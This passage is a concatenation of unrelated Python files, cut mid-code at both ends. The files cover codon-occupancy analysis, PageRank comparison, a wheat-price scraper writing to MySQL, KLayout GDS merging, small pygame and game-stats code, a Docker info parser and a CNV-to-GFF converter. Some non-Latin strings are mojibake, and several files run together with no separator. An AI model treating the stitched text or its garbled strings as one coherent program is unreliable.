        writer = csv.writer(fc)
        writer.writerows(intable)
        fc.close()
    def codonaverage(self):
        # Driver: build the motif file list, log the run parameters, load the
        # density/UTR/exclusion dictionaries, then delegate to occupancy().
        outlist,headers,motiffilelist= [],[],[]
        headers.append("motif")
        for motif in self.motifs:
            motiffile= args.motiffilerootpath+ motif+ "_1.csv"
            motiffilelist.append(motiffile)
            headers.append(motif)
        outlist.append(headers)
        codon_occu = []
        codon_occu.append(self.sample_name)
        f_output= open(args.outfileparams, "w")
        f_output.write("Density file is "+str(self.sample_name)+"\n")
        f_output.write("cds5trim is "+str(args.cds5trim)+"\n")
        f_output.write("cds3trim is "+str(args.cds3trim)+"\n")
        f_output.write("Seqwin is "+str(args.seqwin)+"\n")
        f_output.write("Motiflist is "+str(motiffilelist)+"\n")
        readcountsdict= rph.readcountsf(args.trspdictfilestring)
        exclusionmodule= exclusionfiles[0]
        if exclusionmodule!= '0':
            exclusiondict= self.readindict(open(exclusionmodule,"rU"))
        else:
            exclusiondict= '0'
        print "Exclusion file is "+str(exclusionmodule)
        UTRdict= rph.readindict(open(args.UTRfilestring, "rU"))
        occupancy= self.occupancy(readcountsdict,motiffilelist,exclusiondict,codon_occu,UTRdict,f_output)
        outlist.append(codon_occu)
        f_output.close()
        co= np.asarray(outlist) # convert outlist to a np.array
        output= co.T
        # print "output: ", output
        # print "self.outlistfile: ", self.outlistfile
        self.writerows(output,self.outlistfile) # write these rows to a csv
    def occupancy(self,readcountsdict,motiffilelist,exclusiondict,codon_occu,UTRdict,f_output):
        """
        This is the workhorse of this function
        It is handling the actual density values at the transcript level:
        for each motif csv it averages, over all usable occurrences, the
        ratio of local density at the codon to the transcript's cds density,
        and appends that average to codon_occu.
        """
        for genelist in motiffilelist: # motiffilelist is a list contaning all codons to be analyzed
            ### genelist is csv file with all transcripts containing a specific codon
            f_output.write("Processing "+str(genelist)+"\n")
            f_csv= open(genelist,"rU")
            pausedict= self.readOrderedDict(f_csv) # read in the dictionary with all occurances of a codon in the genome
            count= 0
            inputpos= 0
            ratio_sum= 0
            for trsp in pausedict: # iterate through csv file of codon positions - this is pausedict - ex: hg19_AAA_1.csv
                if trsp== "headers": continue # first line should be: 'headers,gene,chrom,trsp_num,cds_pos'
                else: trspname= trsp.split("_",1)[0] # example line: 'uc004fop.3,PLCXD1,chrY,0,246' the first line for hg19_AAA_1.csv
                if exclusiondict!= '0':
                    if exclusiondict.has_key(trspname): continue # filter out transcripts present in exclusiondict
                if UTRdict.has_key(trspname): # check that transcript is present in UTRdict and set utr5len and cdslen
                    utr5len= int(UTRdict[trspname][5])
                    cdslen= int(UTRdict[trspname][4])
                else: continue
                cdspos= int(pausedict[trsp][3])
                mrnapos= cdspos+ utr5len
                chrom= pausedict[trsp][1]
                featnum= int(pausedict[trsp][2])
                inputpos+= 1
                if readcountsdict.has_key(trspname): cdscounts= readcountsdict[trspname][utr5len:utr5len+ cdslen]
                else: continue
                tooclosetostartorstop= 6 # This is arbitrary, set boundaries around start and stop codon as function of seqwin
                # at a minimum, do not include any transcript within 2 codons
                if cdspos- int(self.seqwin[0])- tooclosetostartorstop < 0 or cdspos+ int(self.seqwin[1])+ tooclosetostartorstop> cdslen: continue # throw out things too close to start or stop, within 2 codons minimum
                # set the location of density values to be queried
                # with default value of [0,3], window scores three nucleotides within the codon
                else: loccounts= cdscounts[cdspos- int(self.seqwin[0]): cdspos+ int(self.seqwin[1])] # this is a 3nt window with default settings
                trimmed_cdscounts= cdscounts[int(self.cds5trim):cdslen- int(self.cds3trim)] # remove first N nt's and last nt's of cdscounts
                if len(trimmed_cdscounts)== 0 or len(loccounts)== 0: continue
                cdsdensity= sum(trimmed_cdscounts)/len(trimmed_cdscounts) # density accross entire transcript
                locdensity= sum(loccounts)/len(loccounts) # density at querry location
                # only throw away transcripts that have no reads in the cds
                if cdsdensity== 0: continue # include ZERO motif density
                #if cdsdensity==0 or locdensity==0: continue # exclude ZERO motif density
                # calculate codon density ratio relative to that of the transcript
                locratio= locdensity/cdsdensity
                count+= 1 # record a codon occurence as counted
                ratio_sum+= locratio # sum accross all densities in transcriptome, keep running average, this is additive for all occurances of this codon
            if count== 0: # for when nothing makes it through all forms of filtering
                #print "No genes to average."
                occupancy= "No genes to average"
                f_output.write("No genes to average"+"\n")
            else:
                occupancy= ratio_sum/count # average density per occrance of this codon
                #print str(count)+" positions averaged. "
                f_output.write(str(count)+" positions averaged. Occupancy= "+ str(occupancy)+ "\n")
            codon_occu.append(occupancy) # record occupancy for this codon genome wide
    def readOrderedDict(self,f):
        # Read a csv into an OrderedDict keyed by column 0, suffixing
        # repeated consecutive keys with _1, _2, ... to keep them distinct.
        from collections import OrderedDict
        previousgene= ""
        counter= 1
        filegen= csv.reader(f, delimiter=',')
        output= OrderedDict()
        for gene in filegen:
            if gene[0]== previousgene:
                modgenename= gene[0]+"_"+str(counter)
                counter+= 1
            else:
                modgenename= gene[0]
                counter= 1
            output[modgenename]= []
            for element in gene[1:]:
                output[modgenename].append(element)
            previousgene= gene[0]
        return output
    def readindict(self,f):
        # Same as readOrderedDict but returns a plain (unordered) dict.
        previousgene=""
        counter=1
        filegen=csv.reader(f,delimiter=',')
        output = {}
        for gene in filegen:
            if gene[0]==previousgene:
                modgenename=gene[0]+"_"+str(counter)
                counter+=1
            else:
                modgenename=gene[0]
                counter=1
            output[modgenename]=[]
            for column in gene[1:]:
                output[modgenename].append(column)
            previousgene=gene[0]
        return output
if __name__== '__main__':
    # CLI entry point (Python 2). NOTE: `args` and `exclusionfiles` are also
    # read as module-level globals inside codonoccupancy's methods.
    parser= argparse.ArgumentParser()
    parser.add_argument('--motiffilerootpath', help= 'motiffilerootpath')
    parser.add_argument('--motifs', help= 'list of motifs')
    parser.add_argument('--trspdictfilestring', help= 'path to density files', required= True)
    parser.add_argument('--sample_name', help= 'name of sample being analyzed')
    parser.add_argument('--UTRfilestring', help= 'UTRfilestring', required= True)
    parser.add_argument('--cds5trim', help= 'trim from 5 end of cds')
    parser.add_argument('--cds3trim', help= 'trim from 3 end of cds')
    parser.add_argument('--seqwin', help= 'seqwin')
    parser.add_argument('--exclusionfiles', help= 'files to exclude transcripts')
    parser.add_argument('--outfileparams', help= 'output path for log file')
    parser.add_argument('--outlistfile', help= 'outputfile path and file name')
    args = parser.parse_args()
    print args.motifs
    import ast
    # List-valued arguments arrive as Python-literal strings on the CLI.
    seqwin= ast.literal_eval(args.seqwin) # convert string to list object
    # densityfiles= ast.literal_eval(args.densityfiles) # convert to list
    motifs= ast.literal_eval(args.motifs) # convert codons to list
    exclusionfiles= ast.literal_eval(args.exclusionfiles)
    codonavg= codonoccupancy(args.sample_name,motifs,seqwin,args.UTRfilestring,args.cds5trim,args.cds3trim,exclusionfiles,args.outfileparams,args.outlistfile)
    codonavg.codonaverage()
|
import copy
def loadDataSet(FilePath):
    """Parse one PageRank output file.

    Each line looks like ``<name>\\t<rank>#...``. Returns the list of names
    in file order and a name -> rank (float) mapping.
    """
    dataSet = []
    prMap = {}
    # with-statement guarantees the handle is closed (the original leaked it).
    with open(FilePath, "r", encoding='utf-8') as fd:
        for line in fd:
            personName = line.split("\t")[0]
            payload = line.split("\t")[1]  # renamed: original shadowed builtin `list`
            pr = float(payload.split("#")[0])
            dataSet.append(personName)
            prMap[personName] = pr
    return dataSet, prMap
# Script: compare consecutive PageRank result files (Data1..Data20) and
# report, for the top-100 names, how stable the ranking is between runs.
if __name__ == "__main__":
    begin = 1
    dirPath = "PR/Data"+str(begin)+"/part-r-00000"
    dataSet, prMap = loadDataSet(dirPath)
    # NOTE(review): `len` shadows the builtin for the rest of this block.
    len = dataSet.__len__()
    # Selection sort, descending by PageRank value.
    for i in range(len):
        maxIndex = i
        for j in range(i+1, len):
            personName = dataSet[j]
            if prMap[dataSet[maxIndex]] < prMap[personName]:
                maxIndex = j
        strName = dataSet[maxIndex]
        dataSet[maxIndex] = dataSet[i]
        dataSet[i] = strName
    prevSortArray = dataSet
    accurate = []
    for fileIndex in range(begin+1, 21):
        filePath = "PR/Data"+str(fileIndex)+"/part-r-00000"
        postDataSet, postPrMap = loadDataSet(filePath)
        # Same descending selection sort for the next iteration's results.
        for i in range(len):
            maxIndex = i
            for j in range(i+1,len):
                personName = postDataSet[j]
                if postPrMap[postDataSet[maxIndex]] < postPrMap[personName]:
                    maxIndex = j
            strName = postDataSet[maxIndex]
            postDataSet[maxIndex] = postDataSet[i]
            postDataSet[i] = strName
        count = 0
        testLen = 100  # assumes each file has at least 100 names -- TODO confirm
        # A name "matches" when it reappears within +/-2 positions of its
        # previous rank; count the top-100 names that do NOT match.
        for i in range(testLen):
            count += 1
            for bias in range(-2, 3):
                j = i + bias
                if j >= 0 and j < len and prevSortArray[i] == postDataSet[j]:
                    count -= 1
                    break
        print(str(fileIndex)+": ", count/float(testLen))
        accurate.append(1.0-count/float(testLen))
        prevSortArray = copy.deepcopy(postDataSet)
    print(accurate)
|
import csv
import re
import requests
from bs4 import BeautifulSoup
from datetime import datetime, timedelta
import pymysql
# Browser-like request headers so the site serves the normal HTML page
# instead of blocking the scraper.
headers = {'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application'
                     '/signed-exchange;v=b3;q=0.9',
           'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.'
                         '3945.130 Safari/537.36'}
def get_html(url, headers):
    """Download *url* and return the response body as text.

    NOTE(review): certificate verification is disabled (verify=False);
    confirm that is intentional for the target site.
    """
    response = requests.get(url, headers=headers, verify=False)
    return response.text
# def write_csv(data):
# name_file = 'rif.csv'
# with open(name_file, 'a', errors='ignore', newline='') as file:
# writer = csv.writer(file, delimiter=';')
# writer.writerow((data['product'], data['price'], data['city'], data['date']))
def write_in_sql(data):
    """Insert one parsed ad record into the ``Pshenitsa`` MySQL table.

    data: dict with keys 'product', 'price', 'city', 'date' (scraped text).
    """
    connect = pymysql.connect(host='localhost', user='', password='', db='', charset='utf8')
    try:
        with connect.cursor() as cursor:
            # Parameterized query: the values come from scraped, untrusted
            # HTML -- never interpolate them into the SQL string (the
            # original used %-formatting, an injection vector).
            write_sql = 'INSERT INTO Pshenitsa (Ad, Price, Region, Date) VALUES (%s, %s, %s, %s)'
            cursor.execute(write_sql, (data['product'], data['price'], data['city'], data['date']))
        connect.commit()
    finally:
        # Close the connection even when the insert fails (original leaked it).
        connect.close()
def parser_html(html):
    """Extract wheat price rows from the elevator page and store each ad.

    NOTE(review): product/price/city/date are assigned only when their
    regexes match; an ad block missing a field raises NameError on the
    first iteration or silently reuses a stale value from the previous
    ad -- confirm the page always provides all four fields.
    """
    soup = BeautifulSoup(html, 'lxml')
    ads = soup.find_all('div', class_='main-price-elevator-item')
    for ad in ads:
        find_all_price = ad.find('table', class_='price').find_all('tr', class_='line-second price-data')
        # print(find_all_price)
        for find_price in find_all_price:
            # Normalize: decimal comma -> dot, abbreviated unit -> full unit.
            get_price = find_price.find('td').text.rstrip().lstrip().replace(',', '.').replace('ั.', 'ััะฑ/ะบะณ')
            search_digits = re.search('(\d+.\d+)', get_price)
            if search_digits is not None:
                price = get_price
                # print(price)
        get_product = ad.find('div', class_='name').text.lower().rstrip().lstrip()
        # Keep only ads whose name mentions wheat.
        search_product = re.search('(ะฟัะตะฝะธัะฐ)', get_product)
        if search_product is not None:
            product = get_product.replace('-ะณะพ', '')
            # print(product)
        find_region = ad.find('p').text
        # City is the word after the "ะณ." (city) marker.
        search_city = re.search('(ะณ.\s\w+)', find_region)
        if search_city is not None:
            city = search_city.group().split()[1]
            # print(city)
        find_date = ad.find('h3').find('span').text.split()[0]
        # Re-format dd.mm.YYYY -> dd.mm.yy for storage.
        date = datetime.strptime(find_date, '%d.%m.%Y').strftime('%d.%m.%y')
        # print(date)
        info = {'product': product, 'price': price, 'city': city, 'date': date}
        write_in_sql(info)
        # print(info)
def main():
    """Fetch the filtered price page and persist the parsed wheat ads."""
    # Query string pins specific elevators, crop id 127 and class filters.
    url = ('https://rif-rostov.ru/price/?arElevators%5B%5D=231&arElevators%5B%5D=99754&arElevators%5B%5D=42711'
           '&arElevators%5B%5D=42639&arElevators%5B%5D=42643&arElevators%5B%5D=99417&arElevators%5B%5D=99738'
           '&arElevators%5B%5D=42647&arElevators%5B%5D=99418&arElevators%5B%5D=96279&arElevators%5B%5D=97237'
           '&arElevators%5B%5D=96465&arElevators%5B%5D=226&arElevators%5B%5D=227&arElevators%5B%5D=98900&arElevators'
           '%5B%5D=576&arElevators%5B%5D=96517&arElevators%5B%5D=233&arElevators%5B%5D=97268&arCrops%5B%5D=127'
           '&arClasses%5B%5D=3&arClasses%5B%5D=%D0%B1%D0%B5%D0%BB%D0%BE%D0%B7%D0%B5%D1%80%D0%BD%D0%B0%D1%8F&arClasses'
           '%5B%5D=4&arClasses%5B%5D=5 ')
    page = get_html(url, headers)
    parser_html(page)

if __name__ == '__main__':
    main()
|
import pya

# Merge per-macro GDS files into a routed DEF and write one flat GDS.
# NOTE(review): tech_file, in_def, design_name, in_gds and out_gds are not
# defined in this chunk -- presumably supplied by the caller (e.g. KLayout's
# `-rd var=value` mechanism); confirm before running standalone.

# Load technology file
tech = pya.Technology()
tech.load(tech_file)
layoutOptions = tech.load_layout_options
# Load def file
main_layout = pya.Layout()
main_layout.read(in_def, layoutOptions)
# Clear cells
top_cell_index = main_layout.cell(design_name).cell_index()
print("INFO: Clearing cells...")
for i in range(main_layout.cells()):
    if i != top_cell_index:
        cname = main_layout.cell_name(i)
        # Keep VIA* cells; everything else is emptied so the merged GDS
        # geometry replaces the DEF placeholders.
        if not cname.startswith("VIA"):
            print("\t" + cname)
            main_layout.cell(i).clear()
# Load in the gds to merge
print("INFO: Merging gds files...")
for gds in in_gds.split():
    print("\t" + gds)
    main_layout.read(gds)
# Copy the top level only to a new layout
print("INFO: Copying toplevel cell '" + design_name + "'")
top_only_layout = pya.Layout()
top_only_layout.dbu = main_layout.dbu
top = top_only_layout.create_cell(design_name)
top.copy_tree(main_layout.cell(design_name))
# Write out the gds
print("INFO: Write out gds '" + out_gds + "'")
top_only_layout.write(out_gds)
|
class GameStats:
    """Track statistics for rocket_game."""

    def __init__(self, r_game):
        """Initialize statistics; the high score persists across sessions."""
        self.settings = r_game.settings
        self.reset_stats()
        # Start Rocket Game in an inactive state.
        self.game_active = False
        # High score should not be reset. Fall back to 0 when the file is
        # missing or holds non-numeric junk instead of crashing at startup.
        try:
            with open("highscore.txt") as file_object:
                self.high_score = int(file_object.read())
        except (FileNotFoundError, ValueError):
            self.high_score = 0

    def reset_stats(self):
        """Initialize statistics that can change during the game."""
        self.rockets_left = self.settings.rocket_limit
        self.score = 0
        self.fuel_remaining = self.settings.fuel
|
# Draw a cartoon face with a "PYTHON is AMAZING" banner, then idle until
# the window is closed.
import pygame
from pygame.draw import *

pygame.init()

FPS = 30
screen = pygame.display.set_mode((800, 625))

# head and body
circle(screen, (255, 213, 0), (400, 650), 160)
circle(screen, (218, 195, 195), (400, 400), 150)
# nose
polygon(screen, (67, 37, 37), [(385, 385), (415, 385), (400, 415)])
polygon(screen, (0, 0, 0), [(385, 385), (415, 385), (400, 415)], 1)
# mouth
polygon(screen, (180, 50, 50), [(300, 425), (500, 425), (405, 481)])
polygon(screen, (0, 0, 0), [(300, 425), (500, 425), (405, 480)], 1)
# eyes
circle(screen, (39, 185, 255), (350, 350), 35)
circle(screen, (39, 185, 255), (450, 350), 35)
circle(screen, (0, 0, 0), (350, 351), 35, 1)
circle(screen, (0, 0, 0), (450, 351), 35, 1)
# pupils
circle(screen, (0, 0, 0), (340, 345), 15)
circle(screen, (0, 0, 0), (460, 345), 15)
# arms 1 and 2
polygon(screen, (218, 195, 195), [(170, 175), (185, 165), (260, 515), (245, 520)])
polygon(screen, (218, 195, 195), [(630, 175), (615, 165), (540, 515), (555, 520)])
# shoulders
polygon(screen, (255, 213, 0), [(270, 490), (300, 525), (285, 575), (230, 565), (225, 515)])
polygon(screen, (0, 0, 0), [(270, 490), (300, 525), (285, 575), (229, 565), (225, 515)], 1)
polygon(screen, (245, 213, 0), [(530, 490), (500, 525), (515, 575), (570, 565), (575, 515)])
polygon(screen, (0, 0, 0), [(530, 490), (500, 525), (520, 575), (571, 565), (575, 515)], 1)
# hands
ellipse(screen, (218, 195, 195), (160, 135, 55, 92))
ellipse(screen, (218, 195, 195), (585, 135, 55, 92))
# banner
rect(screen, (136, 170, 55), (150, 100, 500, 100))
rect(screen, (0, 0, 0), (150, 100, 500, 100), 2)
# banner text
font_obj = pygame.font.Font('freesansbold.ttf', 45)
text_surface_obj = font_obj.render('PYTHON is AMAZING', True, (0, 0, 0), (136, 170, 55))
text_rect_obj = text_surface_obj.get_rect()
text_rect_obj.center = (400, 150)
screen.blit(text_surface_obj, text_rect_obj)
# hair (eight purple spikes, each with a black outline)
polygon(screen, (91, 30, 235), [(300, 284), (325, 271), (305, 255)])
polygon(screen, (0, 0, 0), [(300, 284), (325, 271), (305, 255)], 1)
polygon(screen, (91, 30, 235), [(500, 284), (475, 271), (495, 255)])
polygon(screen, (0, 0, 0), [(500, 284), (475, 271), (495, 255)], 1)
polygon(screen, (91, 30, 235), [(329, 269), (346, 260), (324, 247)])
polygon(screen, (0, 0, 0), [(329, 269), (346, 260), (324, 247)], 1)
polygon(screen, (91, 30, 235), [(471, 269), (456, 260), (476, 247)])
polygon(screen, (0, 0, 0), [(471, 269), (456, 260), (476, 247)], 1)
polygon(screen, (91, 30, 235), [(350, 259), (374, 254), (358, 235)])
polygon(screen, (0, 0, 0), [(350, 259), (374, 254), (358, 235)], 1)
polygon(screen, (91, 30, 235), [(450, 259), (426, 254), (442, 235)])
polygon(screen, (0, 0, 0), [(450, 259), (426, 254), (442, 235)], 1)
polygon(screen, (91, 30, 235), [(376, 253), (400, 251), (389, 232)])
polygon(screen, (0, 0, 0), [(376, 253), (400, 251), (389, 232)], 1)
polygon(screen, (91, 30, 235), [(424, 253), (400, 251), (411, 232)])
polygon(screen, (0, 0, 0), [(424, 253), (400, 251), (411, 232)], 1)
pygame.display.update()

# Event loop: keep the window open until the user closes it.
clock = pygame.time.Clock()
finished = False
while not finished:
    clock.tick(FPS)
    for event in pygame.event.get():
        if event.type == pygame.QUIT:
            finished = True
pygame.quit()
# coding=utf-8
"""
DATE: 2021/5/18
AUTHOR: Yanxi Li
"""
import time
import random
# ่ฟไธชไธ็จ
def random_time_v2():
    """Print 10 random "%Y-%m-%d %H:%M:%S" timestamps drawn uniformly
    between 2021-05-16 00:00:00 and 2021-05-18 00:00:00 (local time).

    The original source had its inline comments wrapped mid-line, which
    made the function a SyntaxError; the comments are rejoined here.
    """
    a1 = (2021, 5, 16, 0, 0, 0, 0, 0, 0)  # start of the date range
    a2 = (2021, 5, 18, 0, 0, 0, 0, 0, 0)  # end of the date range
    start = time.mktime(a1)  # start-of-range Unix timestamp
    print("startๆถ้ดๆณ:", start)
    end = time.mktime(a2)    # end-of-range Unix timestamp
    print("endๆถ้ดๆณ:", end)
    # Draw 10 random timestamps in [start, end] and format each one.
    # int(): mktime returns floats and random.randint rejects floats on
    # Python 3.11+.
    for i in range(10):
        t = random.randint(int(start), int(end))
        date_touple = time.localtime(t)
        date_str = time.strftime("%Y-%m-%d %H:%M:%S", date_touple)
        print(date_str)
import requests
from bs4 import BeautifulSoup
def get_website_title():
    """Fetch sohu.com and print the page's <title> text."""
    response = requests.get("http://www.sohu.com")
    # res.encoding = 'utf-8'  # needed for Baidu, otherwise garbled output
    page = BeautifulSoup(response.text, 'lxml')
    print(page.title.text)

if __name__ == '__main__':
    get_website_title()
|
#!/usr/bin/env python
#_*_ coding:utf-8 _*_
'''
Created on 2018ๅนด3ๆ24ๆฅ
@author: yangxu
'''
'''
DriverStatus : [
[u'Pool Name', u'docker-8:2-407767-pool'],
[u'Pool Blocksize', u'65.54kB'],
[u'Base Device Size', u'10.74GB'],
[u'Backing Filesystem', u'xfs'],
[u'Udev Sync Supported', u'true'],
[u'Data file', u'/dev/loop0'],
[u'Metadata file', u'/dev/loop1'],
[u'Data loop file', u'/data/docker/devicemapper/devicemapper/data'],
[u'Metadata loop file', u'/data/docker/devicemapper/devicemapper/metadata'],
[u'Data Space Used', u'11.8MB'],
[u'Data Space Total', u'107.4GB'],
[u'Data Space Available', u'11.41GB'],
[u'Metadata Space Used', u'581.6kB'],
[u'Metadata Space Total', u'2.147GB'],
[u'Metadata Space Available', u'2.147GB'],
[u'Thin Pool Minimum Free Space', u'10.74GB'],
[u'Deferred Removal Enabled', u'true'],
[u'Deferred Deletion Enabled', u'true'],
[u'Deferred Deleted Device Count', u'0'],
[u'Library Version', u'1.02.140-RHEL7 (2017-05-03)']]
'''
import json
class AssetForm(object):
    """Build an asset record from a ``docker info`` JSON blob.

    Constructing the form parses the blob, derives display strings for
    CPU/memory/disk, and immediately persists the record via ``save()``.
    """

    def __init__(self, data, modelname, address):
        self.data = json.loads(data)
        self.modelname = modelname
        # Keys this form reads out of the docker info payload.
        self.data_key = ['Name', 'OperatingSystem', 'NCPU', 'MemTotal', 'DriverStatus',
                         'ServerVersion', 'Driver', 'DockerRootDir']
        info = self.data
        self.hostname = info['Name']
        self.address = address
        self.sversion = info['OperatingSystem']
        self.dversion = info['ServerVersion']
        self.ddriver = info['Driver']
        self.ddata = info['DockerRootDir']
        self.cpu = str(info['NCPU'])
        # Bytes -> GB (decimal), kept as a display string.
        self.mem = str(info['MemTotal'] / 1000 / 1000 / 1000) + 'GB'
        self.disk = self.get_disk_value()
        self.save()

    def get_disk_value(self):
        """Return the 'Data Space Available' entry from DriverStatus, or None."""
        return next((pair[1] for pair in self.data['DriverStatus']
                     if 'Data Space Available' in pair), None)

    def save(self):
        """Persist the collected fields through the supplied Django-style model."""
        self.modelname.objects.create(
            hostname=self.hostname, address=self.address,
            sversion=self.sversion, cpu=self.cpu,
            mem=self.mem, disk=self.disk,
            dversion=self.dversion, ddriver=self.ddriver,
            ddata=self.ddata, status='up')
# utf-8
# Author: ilikewind
'''
extract patches from trainset to validateset.
'''
import os
import shutil
from tqdm import tqdm
from util_defined import config, hp
# Source and destination patch directories: index 0 = normal, 1 = tumor.
trainset_path = [config.NORMAL_PATCHES, config.TUMOR_PATCHES]
valset_path = [config.VAL_NORMAL_PATCHES, config.VAL_TUMOR_PATCHES]
# Slides whose patches are moved from the training set into validation.
val_wsi_name = ['normal5', 'normal7', 'normal18', 'normal19', 'normal22', 'normal31',
                'tumor4', 'tumor8', 'tumor25', 'tumor31', 'tumor46', 'tumor58', 'tumor72']
for i, path in enumerate(trainset_path):
    for file in tqdm(os.listdir(path)):
        # Patch files are named "<slide>_...". The generator is equivalent
        # to a plain `in val_wsi_name` membership test.
        if file.split('_')[0] in (c for c in val_wsi_name):
            print(file)
            shutil.move(os.path.join(trainset_path[i], file), valset_path[i])
|
import subprocess
class Telegram:
    """Minimal wrapper that launches a telegram-cli executable."""

    def __init__(self, tg_loc):
        # Bug fix: the original signature was `def __init__(tg_loc)` --
        # missing `self` -- so instantiation raised TypeError.
        self.tgcli_location = tg_loc

    def start(self):
        """Launch tg-cli and return the subprocess.Popen handle.

        The original call was truncated (unclosed parenthesis); returning
        the handle lets callers wait on or terminate the process.
        """
        return subprocess.Popen(self.tgcli_location)
|
#!/usr/bin/env python
import csv
import pprint
import sys
import argparse
from collections import OrderedDict
import json
import copy
pp = pprint.PrettyPrinter(indent=0)

# CLI: a CSV/TSV file, a source label, and '|'-separated match lists.
parser = argparse.ArgumentParser(description='Format input data into a gff file.')
parser.add_argument('csv_file_name', help="File for the original data (path + file).")
parser.add_argument('source', help="File label.")
parser.add_argument('case_list', help="List of strings to search for which indicate the cnv is clinically significiant.")
parser.add_argument('ctrl_list', help="List of strings to search for which indicate the cnv is a conrol cnv")
parser.add_argument('pheno_list', help="Phenotype list to filter on, '*' for all.")
args = parser.parse_args()
case_list = args.case_list.split('|')
ctrl_list = args.ctrl_list.split('|')
pheno_list = args.pheno_list.split('|')

# phenotypes to remove (non-informative labels excluded when pheno_list='*')
OUT_LIST = ['IRRELEVANT', 'FAMILY_FOLLOW_UP', 'CHROMOSOME_ABNORMALIRY', 'CHROMOSOME_ABNORMALITY', \
            'OTHER',
            # added
            'Multiple Congenital Anomalies',
            'Congenital Anomaly',
            'Dysmorphic Features',
            'Parent of child with chromosome anomaly',
            'Congenital Heart Defect',
            'Family history of Autism',
            '? Prader-Willi Syndrome',
            'Epilepsy',
            'Reason Not Provided',
            'Family History',
            'Genomic array imbalance in family',
            # more
            'CONGENITAL_MALFORMATION',
            'MIM:176270',
            'MIM:213300',
            'MIM:608638',
            ]
# Free-text phenotype labels -> HPO term IDs.
RENAME_MAP = {
    'Developmental Delay' : 'HP:0001263',
    'Autism' : 'HP:0000717',
    'Facial Dysmorphism' : 'HP:0001999',
    'Cardiac Malformation' : 'HP:0002564',
    'Seizures' : 'HP:0001250',
    'Microcephaly' : 'HP:0000252',
    'Behavioural/Psychiatric Abnormality' : 'HP:0000708',
    'Cleft Palate' : 'HP:0000175',
    'Failure to Thrive' : 'HP:0001508',
    'Short Stature' : 'HP:0004322',
    'Intellectual Disability' : 'HP:0001249',
    'Learning Disability' : 'HP:0001328',
    'Ambiguous Genitalia' : 'HP:0000062',
    'Ventricular Septal Defect' : 'HP:0001629',
    'Hypospadias' : 'HP:0000047',
    'Stillbirth' : 'HP:0001624',
    'Increased risk of malignancy' : 'HP:0006741',
    'Amenorrhea' : 'HP:0000141',
    'Intrauterine growth restriction' : 'HP:0001511',
    'Speech delay' : 'HP:0002117',
    }
# Per-column value rewrites applied when emitting the gff extras column.
TRANSFORM_VAL_MAP = {
    'TYPE':{
        'Gain':'DUP',
        'Loss':'DEL'},
    }
def make_gff(variant, i, counts):
    '''Print one gff line for `variant` (Python 2) and return updated `counts`.

    NOTE(review): despite the original one-liner docstring, this prints the
    gff line rather than returning it. `cnvclass`/`phenotype_prefix` are
    unbound if 'CLASSIFICATION' is missing from `variant` -- confirm the
    input always carries that key.
    '''
    # True if the CNV is fine to print
    cnv_passes = True
    # Label case and controls
    if 'CLASSIFICATION' in variant:
        if variant['CLASSIFICATION'] in ctrl_list:
            cnvclass = 'CTL'
            phenotype_prefix = 'CONTROL_'
        elif variant['CLASSIFICATION'] in case_list:
            cnvclass = 'CNV'
            phenotype_prefix = ''
        else:
            # only print valid cases and controls
            cnv_passes = False
            cnvclass = 'ELSE'
            phenotype_prefix = 'ELSE_'
    # gff extra column
    extra = []
    for w in ['GENDER', 'SAMPLE_ID', 'TYPE', 'CYTOBAND', 'CLASSIFICATION']:
        if w in TRANSFORM_VAL_MAP and variant[w] in TRANSFORM_VAL_MAP[w]:
            to_append = TRANSFORM_VAL_MAP[w][variant[w]]
        else:
            to_append = variant[w]
        extra.append('%s=%s' % (w, to_append))
    # phenotypes extra column
    current_phenotype_list = []
    # only add 1 phenotype
    does_not_have_a_phenotype = True
    if type(variant['PHENOTYPE']) is list:
        phenotype_list = variant['PHENOTYPE']
    else:
        phenotype_list = [variant['PHENOTYPE']]
    for current_phenotype in phenotype_list:
        # TODO: use multiple phenotypes?
        if does_not_have_a_phenotype:
            # filter phenotypes by args
            if (pheno_list == ['*'] and (not current_phenotype in OUT_LIST)) or current_phenotype in pheno_list:
                if current_phenotype in RENAME_MAP:
                    current_phenotype = RENAME_MAP[current_phenotype]
                current_phenotype_list.append(phenotype_prefix + current_phenotype)
                # Tally this phenotype/class combination for the stats file.
                if not current_phenotype in counts:
                    counts[current_phenotype] = OrderedDict()
                if not cnvclass in counts[current_phenotype]:
                    counts[current_phenotype][cnvclass] = 0
                counts[current_phenotype][cnvclass] += 1
                does_not_have_a_phenotype = False
    phenotype_str = "[" + ",".join(current_phenotype_list) + "]"
    extra.append("PHENOTYPE=%s" % phenotype_str)
    # format main gff line
    line = ['chr' + variant['CHR'], args.source, "%s.%s.%08d" % (cnvclass, args.source, i), variant['START'], variant['STOP'], '.', '.', '.']
    # format last gff column
    line.append(";".join(extra))
    # only print the line if it includes the filtered phenotypes
    if current_phenotype_list == []:
        cnv_passes = False
    if cnv_passes:
        print "\t".join(line)
    return counts
def change_header_120116(header):
    """Translate the 12/01/16 spreadsheet column names to canonical keys.

    Column names with no mapping pass through unchanged.
    """
    replace_dict = {
        'Date Scanned':'DATE_SCANNED',
        'Lab no.':'SAMPLE_ID',
        'Sex':'GENDER',
        'Clinical Indication':'PHENOTYPE',
        'Protocol':'PROTOCOL',
        'Genome Build':'GENOME_BUILD',
        'chromosome':'CHR',
        'start':'START',
        'stop':'STOP',
        'band':'CYTOBAND',
        'size':'SIZE',
        'max start':'MAX_START',
        'max stop':'MAX_STOP',
        'Max size':'MAX_SIZE',
        'No. probes':'NUM_PROBES',
        'Gain/Loss':'TYPE',
        'Classification':'CLASSIFICATION',
        'Inheritance':'INHERITANCE',
        'Log2 ratio':'LOG2_RATIO',
        'ISCN':'ISCN',
        }
    return [replace_dict.get(column, column) for column in header]
# --- Script body (Python 2: file(), csv in 'rb' mode, iteritems, print >>) ---
# Sniff the delimiter from the first line: comma- vs tab-separated input.
firstline = file(args.csv_file_name).readline()
if len(firstline.split(",")) > len(firstline.split("\t")):
    csv_reader = csv.reader(open(args.csv_file_name, 'rb'), delimiter=',')
else:
    csv_reader = csv.reader(open(args.csv_file_name, 'rb'), delimiter='\t', quotechar='"')
i = -1
counts = OrderedDict()
for row in csv_reader:
    if i == -1:
        # First row is the header; normalize its column names.
        header = row
        header = change_header_120116(header)
    else:
        variant = {}
        # transform line of variant info into a dict based on the header
        for j in range(len(row)):
            # handle ALL_GENES column marta said don't use this column, intersect with genes myself
            if header[j] == 'ALL_GENES':
